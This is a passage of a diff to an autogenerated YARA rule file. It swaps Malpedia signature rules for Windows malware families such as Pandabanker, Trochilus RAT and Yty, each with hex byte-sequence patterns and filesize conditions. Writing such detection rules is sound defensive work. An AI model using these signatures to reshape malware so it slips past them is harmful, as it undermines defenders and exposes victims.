+		$sequence_7 = { 4c8d05117f0000 488d1592750000 e8???????? 8bcb }
+		$sequence_8 = { 488bf8 4885c0 0f8483000000 41b812000000 488d1569550100 488bc8 ff15???????? }
+		$sequence_9 = { 44895c2448 81fae9fd0000 0f8570010000 4c8d3d23aaffff 418bd3 }
 
 	condition:
-		7 of them and filesize < 238592
+		7 of them and filesize < 593920
 }
-rule MALPEDIA_Win_Secondhandtea_Auto : FILE
+rule MALPEDIA_Win_Gacrux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24430ceb-9ce2-5574-9afd-319803953494"
+		id = "08e3a0a1-da81-5882-b134-65281af51162"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.secondhandtea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.secondhandtea_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gacrux_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "7cb092741fedaef6b40610c6e7ec59e3f301485274283d64b8f6a31d3c54f53c"
+		logic_hash = "6278ae90a5acb1d1e22aec25afba6eadcc43cdc1399d5403571d5596bb5e391d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105438,34 +105847,34 @@ rule MALPEDIA_Win_Secondhandtea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? cc 4c8d0554c31400 498bd4 488bcd e8???????? 85c0 }
-		$sequence_1 = { e8???????? 488bcf e8???????? 488b8b18100000 8b93fc070000 0fb701 3bd0 }
-		$sequence_2 = { 753b c744242025000000 41b841000000 4c8d0d2e9b0b00 bac6000000 b90d000000 e8???????? }
-		$sequence_3 = { e8???????? 4c8b642468 448be8 4883c470 415d 5f 5e }
-		$sequence_4 = { e8???????? 8bf8 85c0 7ead 294318 7408 014314 }
-		$sequence_5 = { e8???????? 4533c0 4c8d8bb4010000 418d502d 488bc8 e8???????? 488bcf }
-		$sequence_6 = { e9???????? 498bc9 e8???????? 488bf8 4885c0 7527 4c8d0d9d780f00 }
-		$sequence_7 = { e8???????? 488be8 4885c0 750f 488d154fac0c00 488bcf e8???????? }
-		$sequence_8 = { e8???????? 418bc7 488b4d68 4833cd e8???????? 488b9da0000000 488bb5a8000000 }
-		$sequence_9 = { e8???????? 33c0 ebc1 ba7a000000 4c8d0d517c0a00 c744242078000000 8d4a89 }
+		$sequence_0 = { 85c9 743c 6548 8b0425???????? 80780201 7428 48 }
+		$sequence_1 = { 33db e8???????? 48 8bf8 48 85c0 742f }
+		$sequence_2 = { 3900 75f4 48 63c2 85d2 740a 48 }
+		$sequence_3 = { 740b 41 81cb00900000 45 895821 40 f6c610 }
+		$sequence_4 = { e8???????? 4c 8bc3 33d2 48 8bcf ffd0 }
+		$sequence_5 = { 3c40 755f 41 0fbaea1e 40 8ac7 c0e803 }
+		$sequence_6 = { 0fb6c3 44 3bc8 0f850f010000 44 0fb66d67 43 }
+		$sequence_7 = { 75f6 e8???????? 48 83c428 c3 48 }
+		$sequence_8 = { eb02 33db 8b4c2460 0337 392f 75a5 eb5d }
+		$sequence_9 = { 83e801 7463 83e801 7457 83e802 744b }
 
 	condition:
-		7 of them and filesize < 4452352
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Dnschanger_Auto : FILE
+rule MALPEDIA_Win_Yty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fa9e2eb-93b3-59e8-87b9-56660e0e1de0"
+		id = "b178a64d-90f2-5e14-9301-2d60f407465c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnschanger_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yty_auto.yar#L1-L503"
 		license_url = "N/A"
-		logic_hash = "a0798da45c8d16b6b8cbe6087cae140990ddc919bfe764b8983fff724ffd7558"
+		logic_hash = "ba7411fc89742deab8ac323283edaf67308d62adecd7c34f413e3b6a25925cab"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -105477,32 +105886,77 @@ rule MALPEDIA_Win_Dnschanger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c418 8d542410 8d442414 52 6806000200 6a00 50 }
-		$sequence_1 = { 8d442414 52 6806000200 6a00 50 }
-		$sequence_2 = { 6a08 32db ffd5 50 ff15???????? }
-		$sequence_3 = { 32c0 eb0b ff15???????? 85c0 }
-		$sequence_4 = { 8d442410 8b8b9c010000 50 57 51 e8???????? 83f86f }
-		$sequence_5 = { 57 e8???????? 8b2d???????? 6880020000 6a08 }
-		$sequence_6 = { 2ad1 f6da 1bd2 f7d2 23c2 }
-		$sequence_7 = { 8bf0 8d45f8 50 ff75f8 56 6a03 ff75fc }
-		$sequence_8 = { 84d2 7407 8a11 8816 46 }
-		$sequence_9 = { 8b442410 85c0 742a 83f80a 7415 }
+		$sequence_0 = { 0f840c000000 8365d8fe 8b7508 e9???????? c3 8b542408 8d420c }
+		$sequence_1 = { 64a300000000 8b7508 33ff 897dd8 }
+		$sequence_2 = { 8b5610 33c9 33c0 8d7910 }
+		$sequence_3 = { b901000000 e9???????? 8b5508 397d1c 7303 8d5508 }
+		$sequence_4 = { 5f 668910 8bc6 5b 8be5 5d c20400 }
+		$sequence_5 = { 8bfe 80ea13 b903000000 eb58 }
+		$sequence_6 = { 8b4c3138 33db 895de8 885def 8975e0 85c9 }
+		$sequence_7 = { 50 ffd2 ff15???????? 8a857bffffff 8b4df4 }
+		$sequence_8 = { 8b08 8b5108 50 ffd2 8b8568ffffff 8b08 }
+		$sequence_9 = { c645fc01 e8???????? 8b10 8b4a04 03c8 }
+		$sequence_10 = { 807def00 8b5de8 7503 83cb02 8b16 8b4a04 }
+		$sequence_11 = { 8bcf e8???????? 8b0e 8b5104 8b443238 }
+		$sequence_12 = { 8906 894604 894608 8945fc 56 c745f001000000 }
+		$sequence_13 = { 8bfe 80ea04 b904000000 eb23 }
+		$sequence_14 = { 397e14 7214 8a1402 8b3e 2ad1 }
+		$sequence_15 = { 7204 8b3e eb02 8bfe 8a1402 2ad1 80ea13 }
+		$sequence_16 = { 51 e8???????? 83c408 8bf0 6a0a }
+		$sequence_17 = { 50 e8???????? 83c40c 8d8de8fdffff 51 53 }
+		$sequence_18 = { 50 8bce c60600 e8???????? 8b5610 33c9 }
+		$sequence_19 = { 8d8de8fdffff 51 53 53 6a28 53 }
+		$sequence_20 = { 33c9 881407 bf10000000 40 3b4610 }
+		$sequence_21 = { c0ea02 8ac4 80e20f c0e004 }
+		$sequence_22 = { 8b07 eb02 8bc7 8b4de0 }
+		$sequence_23 = { c645fc07 e8???????? 8bf0 891f 6a08 c645fc0c e8???????? }
+		$sequence_24 = { 8b4c1938 895dd4 85c9 7405 8b01 ff5004 c745fc00000000 }
+		$sequence_25 = { 25ff000000 83c001 25fe010000 f20f593c85c0014600 660f122c85c0014600 }
+		$sequence_26 = { c70424???????? e8???????? 85c0 7424 c70424f4010000 e8???????? 83ec04 }
+		$sequence_27 = { 8b5508 83e23f 6bd230 8b0c8d00b04600 88441128 e9???????? 8b5508 }
+		$sequence_28 = { c74410e05c584600 8b42e0 8b4804 8d41e8 894411dc c745fc00000000 }
+		$sequence_29 = { 33f6 bf???????? 833cf584fe420001 751d 8d04f580fe4200 }
+		$sequence_30 = { 0f1000 0f1105???????? f30f7e4010 660fd605???????? e8???????? 8d8590bcf0ff }
+		$sequence_31 = { 0bc8 51 e8???????? 83c404 8d8dd4efffff 83bde8efffff10 }
+		$sequence_32 = { 83e3fc ba00000000 898c15a4feffff 83c204 }
+		$sequence_33 = { 01c8 0fb600 38c2 7410 c745e401000000 c745e000000000 eb18 }
+		$sequence_34 = { 8d8588feffff 890424 e8???????? 8d85bafeffff }
+		$sequence_35 = { c1fe05 c1e106 030cb5a0244300 eb02 8bca f641247f 759c }
+		$sequence_36 = { 39e8 741e c74424045c000000 893c24 }
+		$sequence_37 = { c78534ffffff00000000 6a00 50 e8???????? 83c404 8d8d38ffffff e8???????? }
+		$sequence_38 = { 3d04010000 7607 b801000000 eb33 c744240404010000 }
+		$sequence_39 = { 57 33ff ffb744fe4200 ff15???????? }
+		$sequence_40 = { 89e5 83ec28 c745eb00000000 c645ef00 c745f400000000 }
+		$sequence_41 = { 6a40 6a00 8d8590fcffff 50 e8???????? 83c40c }
+		$sequence_42 = { f3ab 8d4dfb e8???????? 8d4dfb e8???????? }
+		$sequence_43 = { 83f809 7d10 40 ba???????? 50 e8???????? }
+		$sequence_44 = { 8bec 8b4508 ff34c580fe4200 ff15???????? }
+		$sequence_45 = { ff15???????? 8d8d90bcf0ff e8???????? 8bf0 c645fc03 }
+		$sequence_46 = { 64a300000000 8b7510 56 ff15???????? 85c0 0f84cb010000 }
+		$sequence_47 = { 83e13f 6bd130 8b048500b04600 807c102900 7536 8b4d0c 3b4d14 }
+		$sequence_48 = { 8b45ec 3b45e0 7517 8b4508 0345e0 894508 }
+		$sequence_49 = { 8bf4 8b8578fcffff 50 ff15???????? 3bf4 e8???????? 8bf4 }
+		$sequence_50 = { 8b4d10 394de0 7752 037de0 8b45f0 8b55e8 8b048560cb4300 }
+		$sequence_51 = { 6a01 e8???????? ebd7 85ff }
+		$sequence_52 = { 3c5a 770f 0fbec1 0fb680d0ed4200 83e00f eb02 33c0 }
+		$sequence_53 = { e8???????? 85c0 756f 8b8328020000 }
+		$sequence_54 = { 898584fbffff 8d85e8fdffff 6808020000 50 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 1097728
 }
-rule MALPEDIA_Win_Roadsweep_Auto : FILE
+rule MALPEDIA_Win_Pandabanker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6c093c47-8e58-51ee-ae4c-89b38c2f042b"
+		id = "d7a6bb16-47e5-52e8-857d-352f3fc1d921"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roadsweep"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roadsweep_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pandabanker_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "0d07cae12c5491ee120ce765fa753d2699b968376031bccf1e21a7a431677bd5"
+		logic_hash = "7224c438b16af79be738a189a249337e2e081d636ca75e4e1c5b1122ffa5e8c5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105516,32 +105970,32 @@ rule MALPEDIA_Win_Roadsweep_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89542404 e8???????? 3955cc 89c3 c745b800000000 }
-		$sequence_1 = { e9???????? c7442404???????? c7042404010000 e8???????? 83ec08 e9???????? c744240404010000 }
-		$sequence_2 = { 8b45e8 85d2 0f885d010000 85d2 0f8ea6010000 }
-		$sequence_3 = { 00d2 8b5d08 83d903 8db534ffffff c744240c00000000 29f9 baffffffff }
-		$sequence_4 = { 56 ba01000000 53 83ec50 8b7508 8d742600 8dbc2700000000 }
-		$sequence_5 = { c744241000000000 89542404 893424 e8???????? 8bbd6cffffff }
-		$sequence_6 = { c745cc04100800 891424 e8???????? 83ec04 85c0 }
-		$sequence_7 = { e8???????? 891c24 8d9578fbffff 89542404 c68578fbffff25 c68579fbffff73 c6857afbffff63 }
-		$sequence_8 = { 890424 e8???????? 89b564ffffff 31c9 48 899d6cffffff }
-		$sequence_9 = { 3d???????? 7207 3d???????? 7216 }
+		$sequence_0 = { d0c2 8ac2 d0c0 32c1 32c2 }
+		$sequence_1 = { 42 83fa10 72ee 8b5500 }
+		$sequence_2 = { 8bf2 57 8bf9 8d8df4fdffff }
+		$sequence_3 = { f3aa 8932 8d46f0 8b5500 }
+		$sequence_4 = { 895c2414 8bf1 e8???????? 84c0 746d 83caff 8bce }
+		$sequence_5 = { 8bf0 85f6 7414 e8???????? 8906 85c0 7509 }
+		$sequence_6 = { 33c0 33d2 89442418 3bfd 7359 }
+		$sequence_7 = { 8bce 2b0f 33448f4c 8944b74c 6a05 59 }
+		$sequence_8 = { 03c8 894c2434 8d5101 8bce e8???????? 85c0 }
+		$sequence_9 = { 75f9 2bce 5e 8d040a c3 33c0 c3 }
 
 	condition:
-		7 of them and filesize < 160768
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE
+rule MALPEDIA_Win_Wormhole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57f6010b-f9b8-526f-94e4-905e1c039cff"
+		id = "6f46fc51-988b-5f8d-9d00-a7686a2cf87f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crypto_fortress_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wormhole_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "260674d34cb12cfd5de2f1a83904a3f49c27965fc58fd434a5b27b625cba2777"
+		logic_hash = "e1e9db1cf90c5ec01e6303b9e0faaa3beb1eeaff1efa494e61bb4a00bebdfa38"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105555,32 +106009,32 @@ rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 045a aa 2cff aa 2cf9 }
-		$sequence_1 = { 0433 aa 04fc aa 3411 }
-		$sequence_2 = { aa 345e aa 04af aa 2cfb aa }
-		$sequence_3 = { aa 040f aa 2c0f }
-		$sequence_4 = { aa 341b aa 2c01 }
-		$sequence_5 = { 894304 83c308 8345fc08 c78548ffffff9c000000 }
-		$sequence_6 = { 2c00 aa 0411 aa 2c51 aa 3421 }
-		$sequence_7 = { 2cee aa 2c01 aa 04f1 }
-		$sequence_8 = { 85c0 0f84d0000000 68???????? 8d85eafeffff 50 }
-		$sequence_9 = { 8bec 83c4f8 53 ff35???????? e8???????? 6bc004 }
+		$sequence_0 = { 56 e8???????? 83c408 8d542410 6aff 6a01 52 }
+		$sequence_1 = { 0f85c1000000 8b15???????? 8d4c2408 51 52 }
+		$sequence_2 = { 6a00 6a00 ffd3 8b1d???????? 6aff 8d4c2414 6a00 }
+		$sequence_3 = { a1???????? 85c0 7531 8b35???????? e8???????? 85c0 7519 }
+		$sequence_4 = { 897c2438 8974243c ffd3 6a00 6a00 89442418 }
+		$sequence_5 = { 6a00 6a00 ff15???????? 85c0 a3???????? 7404 }
+		$sequence_6 = { 6a00 52 68???????? 6a00 6a00 89742430 }
+		$sequence_7 = { 6685c0 743f a1???????? 85c0 7531 }
+		$sequence_8 = { 68c8000000 6a00 56 e8???????? 83c410 83f8ff }
+		$sequence_9 = { 6a01 52 6a02 ffd3 8b35???????? }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 99576
 }
-rule MALPEDIA_Win_Ralord_Auto : FILE
+rule MALPEDIA_Win_Cheesetray_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55aeafd0-036d-55da-b447-46a69b58ad1c"
+		id = "9541e7b5-55cf-5f67-8b69-be87df55796a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ralord"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ralord_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cheesetray_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "0ae32be56308293e8dfe3d78f9cfa5ac160d76644a256ed6b1f7ab39bfe6b399"
+		logic_hash = "8cd561aadd1b5e2f7790bac0781a0595445a0cbe8294d61c87c9d05b79f48756"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105594,32 +106048,32 @@ rule MALPEDIA_Win_Ralord_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7473 66813e4250 488d05d0a30100 7465 66813e5246 488d05c1a30100 7457 }
-		$sequence_1 = { 490b8818080000 756c 4c89c1 4889c6 e8???????? 4889f0 eb5c }
-		$sequence_2 = { 4929d0 0f82c9000000 4939fc 0f87d2000000 4c01f2 4889f1 e8???????? }
-		$sequence_3 = { 4801f0 4829d0 4839f0 0f83bb020000 4d8d7b01 410fb60406 4138040e }
-		$sequence_4 = { 48837d2000 7406 807d2f00 7409 4883c428 5b 5f }
-		$sequence_5 = { 752a 488b4e20 488b4628 488d15522b0100 41b801000000 ff5018 89c1 }
-		$sequence_6 = { 0f80de010000 4839fa 7550 4c8b4dd0 4c89c8 48f7d8 0f80c9010000 }
-		$sequence_7 = { 4889f1 eb27 89442430 488d0551850200 4889442420 488d15a0850200 488d4c2440 }
-		$sequence_8 = { 488d0daf640100 ba10000000 e8???????? 41b601 84c0 0f85b7000000 48c70600000000 }
-		$sequence_9 = { 400f90c6 430fb6141a 83c2d0 83fa09 0f87aa090000 }
+		$sequence_0 = { 83b8a400000000 894d10 7666 8b88a0000000 8b0419 03cb 85c0 }
+		$sequence_1 = { 8b0c8d80ce4400 83e01f c1e006 8d440124 8b4d10 8a10 }
+		$sequence_2 = { 75f7 03c0 50 8d4dfc 51 52 e8???????? }
+		$sequence_3 = { 8b8c24a4000000 83c40c 6a02 51 68???????? ba1f000000 }
+		$sequence_4 = { 81ec84000000 56 6880000000 6a00 8d4580 50 e8???????? }
+		$sequence_5 = { 56 6800100000 6a03 56 6a03 6800000080 57 }
+		$sequence_6 = { 8b5318 52 e8???????? 8b4314 50 e8???????? 83c414 }
+		$sequence_7 = { 40 8945fc 3b85f8feffff 72ad 8b4508 6a00 6a00 }
+		$sequence_8 = { 720e 8b4c2410 3b4c2420 0f83b1000000 8b3d???????? 8d9b00000000 68ff1f0000 }
+		$sequence_9 = { 8d4df4 51 56 e8???????? 6a04 8d9594fdffff }
 
 	condition:
-		7 of them and filesize < 798720
+		7 of them and filesize < 8626176
 }
-rule MALPEDIA_Win_Corebot_Auto : FILE
+rule MALPEDIA_Win_Unidentified_031_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de56ab56-9ec7-5235-bd26-8fc91d55de2c"
+		id = "a627a0b9-017e-5461-a9b3-c89e0fe42650"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.corebot_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_031_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7aa9c17958ef7c5a98a9be16ab271931413c5066734bfef2ec6f0b99a977cc0f"
+		logic_hash = "005409f0a75d0a6c7e76852a5fa0d497560f223da31bb6e0d79d2b1a3b3dfeb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105633,38 +106087,32 @@ rule MALPEDIA_Win_Corebot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7df0 8d55f0 e8???????? 85c0 7411 837df000 }
-		$sequence_1 = { c7411407000000 8d4910 89c6 01c0 c1ee07 }
-		$sequence_2 = { 8932 5e c3 31c0 ebfa 55 89e5 }
-		$sequence_3 = { 8a1c08 84db 741c 01c8 }
-		$sequence_4 = { 8b06 85c0 743d 8b4e04 85c9 751a 83c604 }
-		$sequence_5 = { 50 ff15???????? 85c0 7418 8b0e 6a00 ff750c }
-		$sequence_6 = { 894dd8 b907000000 0fb618 895de8 }
-		$sequence_7 = { 85c0 894dec 7405 8b55e8 eb2c 8b45dc }
-		$sequence_8 = { e8???????? 807e5800 7509 ff7654 ff15???????? 807e5000 7509 }
-		$sequence_9 = { ff7010 ff7014 e8???????? 8b45e0 }
-		$sequence_10 = { eb10 6800800000 6a00 56 }
-		$sequence_11 = { ff15???????? 8d4634 50 ff15???????? 8d4e0c e8???????? }
-		$sequence_12 = { ff15???????? 807e5000 7509 ff764c ff15???????? 8d4634 50 }
-		$sequence_13 = { 85ff 740f 57 ff7508 }
-		$sequence_14 = { ff742428 e8???????? 8b442424 8d4c2410 }
-		$sequence_15 = { 85c0 7515 8b4624 3b4620 }
+		$sequence_0 = { 50 e8???????? 897de8 89bd40ffffff e9???????? 817d8004000400 754f }
+		$sequence_1 = { 3935???????? 7510 68???????? 68???????? ff15???????? 8b35???????? 8d9544ffffff }
+		$sequence_2 = { 83bd78ffffff03 0f82e5feffff 33c0 8b4dfc 5f 5e 5b }
+		$sequence_3 = { 51 52 6a12 ff15???????? 83c44c 8d4da0 ff15???????? }
+		$sequence_4 = { 898bb8200000 898bbc200000 57 8d83b81e0000 50 ffd6 6810140001 }
+		$sequence_5 = { 3d05000780 0f858c000000 837d2001 0f85e3000000 8d4de4 e8???????? 85c0 }
+		$sequence_6 = { e8???????? 8bf8 897dd4 85ff 747f 6a00 53 }
+		$sequence_7 = { 64a100000000 50 64892500000000 81ec04030000 53 56 57 }
+		$sequence_8 = { eb03 33f6 46 ff75c0 ff15???????? 59 8bc6 }
+		$sequence_9 = { 33c0 e9???????? 53 56 ff7508 8d85ecfdffff 50 }
 
 	condition:
-		7 of them and filesize < 1302528
+		7 of them and filesize < 1998848
 }
-rule MALPEDIA_Win_Newposthings_Auto : FILE
+rule MALPEDIA_Win_Shareip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c55cf5a4-9d2e-5a13-be84-37c432415503"
+		id = "9f46ee27-fcc3-5b26-9e77-331cb46925ef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newposthings_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shareip_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "13f1fe8829e7836205b87c0389095410b0edec07cc2b8983a118dc935e06f45f"
+		logic_hash = "b24d153dc5c903a6f61d1f00b3b16ac72a620a7bd569254dc7e2236cbdbfd920"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105678,32 +106126,32 @@ rule MALPEDIA_Win_Newposthings_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec0c 8b4508 8b483c 01c1 813950450000 7551 8d5178 }
-		$sequence_1 = { 68ae520110 64a100000000 50 81ec28010000 a1???????? 33c5 }
-		$sequence_2 = { 8d85f0fcffff 50 6801010000 6a00 c785ecfcffff00000000 }
-		$sequence_3 = { ff750c e8???????? 83c404 c745200f000000 c7451c00000000 c6450c00 b801000000 }
-		$sequence_4 = { 8bce e8???????? c745fcffffffff ff36 e8???????? 83c404 8b4df4 }
-		$sequence_5 = { 833cf5c000021000 7513 56 e8???????? }
-		$sequence_6 = { 57 a1???????? 33c4 50 8d442420 64a300000000 68f0110210 }
-		$sequence_7 = { c68518ffffff00 c645fc10 837d9010 720e ffb57cffffff }
-		$sequence_8 = { 0fb6bc3890b70110 8bc7 c1e804 89bdc4fdffff 8bbde8fdffff 8985c4fdffff }
-		$sequence_9 = { 83c40c 8d842474040000 6890010000 50 6a00 ff15???????? }
+		$sequence_0 = { 8b02 8d8c2414010000 ffd0 83bc243001000000 7425 83bc242401000000 7412 }
+		$sequence_1 = { 56 894c2438 33d2 50 8d4c2440 895c2458 89742454 }
+		$sequence_2 = { 83f8ff 7566 be10000000 39742444 720d 8b542430 52 }
+		$sequence_3 = { 8b7e10 8bcf 2b4d10 b867666666 f7e9 c1fa03 8bc2 }
+		$sequence_4 = { 8b542468 89542424 eb08 8d442468 89442424 39b424ec000000 720d }
+		$sequence_5 = { 8bc2 c1e81f 03c2 83f803 0f8557feffff 8d78ff 8d742414 }
+		$sequence_6 = { 50 8d4c2420 51 8d5f20 c744243803000000 89542448 e8???????? }
+		$sequence_7 = { 8d442408 8da42400000000 8a10 3a11 751a 84d2 }
+		$sequence_8 = { 8b01 8d7001 8a10 40 84d2 75f9 2bc6 }
+		$sequence_9 = { 8bce bb03000000 e8???????? eb02 33c0 c78424b000000002000000 8907 }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 811008
 }
-rule MALPEDIA_Win_Bootwreck_Auto : FILE
+rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c86e0360-3c55-5b68-af4c-6642481fbd38"
+		id = "5e944258-6f12-5085-8358-b91fb7dc5a09"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bootwreck_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.trochilus_rat_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "a7d19ddda34fd585dce842e8452aa3b90378f4a99b150c5642a8436fb2a84d1d"
+		logic_hash = "dca7f9603da83736d27e78d66d52610b99014fe1a1d949a52b24e5b787c59a8a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105717,34 +106165,34 @@ rule MALPEDIA_Win_Bootwreck_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 9e 3ec9 307dd6 14cc 7466 d59d }
-		$sequence_1 = { c60424de 57 9c 875c242c ff742404 54 9c }
-		$sequence_2 = { fd 7919 87c1 0e d9574e 6d 7db2 }
-		$sequence_3 = { 8b8020334500 c60424ef 60 8d8090b42a7f 8d642434 0f8f702c0000 687b1f6def }
-		$sequence_4 = { 660fb6db 89f3 660fbef1 5e 660fce 8b742440 88442404 }
-		$sequence_5 = { 70e8 32ff 46 33e2 41 2eb910b0f8ab 828dc6785b1254 }
-		$sequence_6 = { e8???????? f6d2 8b5620 60 9c ff742404 89542424 }
-		$sequence_7 = { 60 e7c6 45 14bb aa 11fe 1d0a3b6a57 }
-		$sequence_8 = { b6d1 0206 82535e09 3909 a6 ae 57 }
-		$sequence_9 = { 660fb6c9 660bf9 0fb7cf 8b7d10 894d0c 2acb 32c8 }
+		$sequence_0 = { 0f8410010000 8b3d???????? 6894e40010 53 ffd7 85c0 0f84fa000000 }
+		$sequence_1 = { 7405 6a02 5e ebc6 e8???????? eb25 e8???????? }
+		$sequence_2 = { 2bf9 f7df 1bff 23f8 0f849a000000 8b4708 }
+		$sequence_3 = { 53 57 8d4e2c 8bf8 2bf9 f7df 1bff }
+		$sequence_4 = { 56 8bf1 c706d0d10010 e8???????? f6450801 7407 56 }
+		$sequence_5 = { 8b4dfc 8b06 b201 d2e2 081438 663b5d0c 740e }
+		$sequence_6 = { 50 6a06 8d85ecfbffff 50 8bcf }
+		$sequence_7 = { ff7510 8b01 ff750c ff5034 6a00 ff7508 8bfe }
+		$sequence_8 = { 8bce e8???????? eba2 55 8bec 83ec0c 56 }
+		$sequence_9 = { a1???????? c705????????90897e00 8935???????? a3???????? ff15???????? a3???????? }
 
 	condition:
-		7 of them and filesize < 10821632
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Industroyer_Auto : FILE
